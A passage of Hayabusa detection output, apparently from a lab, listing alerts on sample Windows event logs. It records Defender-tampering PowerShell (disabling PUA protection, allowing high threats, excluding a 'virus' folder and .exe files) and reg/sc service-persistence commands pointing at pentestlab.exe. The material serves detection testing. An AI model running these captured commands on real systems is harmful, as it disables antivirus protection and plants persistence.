PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:13.168 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:13.168 +00:00,win10-02.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:18.490 +00:00,win10-02.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:18.955 +00:00,win10-02.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:28.683 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 10:08:33.314 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.362 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -HighThreatDefaultAction 6 -Force,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.671 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""HighThreatDefaultAction""; value=""Allow"" ParameterBinding(Set-MpPreference): name=""Force""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.672 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.680 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 10:08:33.683 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 11:14:56.275 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.300 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionPath c:\document\virus\,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.424 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionPath""; value=""c:\document\virus\"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.425 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.432 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:14:56.435 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.651 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.667 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionExtension '.exe',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.754 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionExtension""; value="".exe"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.755 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.762 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 11:15:06.766 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-07 14:52:54.848 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 14:52:54.848 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 14:53:02.147 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 14:53:02.147 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 15:36:23.429 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:23.429 +00:00,win10-02.offsec.lan,4688,medium,Persis,Modification Of Existing Services For Persistence,,rules/sigma/process_creation_builtin/proc_creation_win_modif_of_services_for_via_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-07 15:36:24.892 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 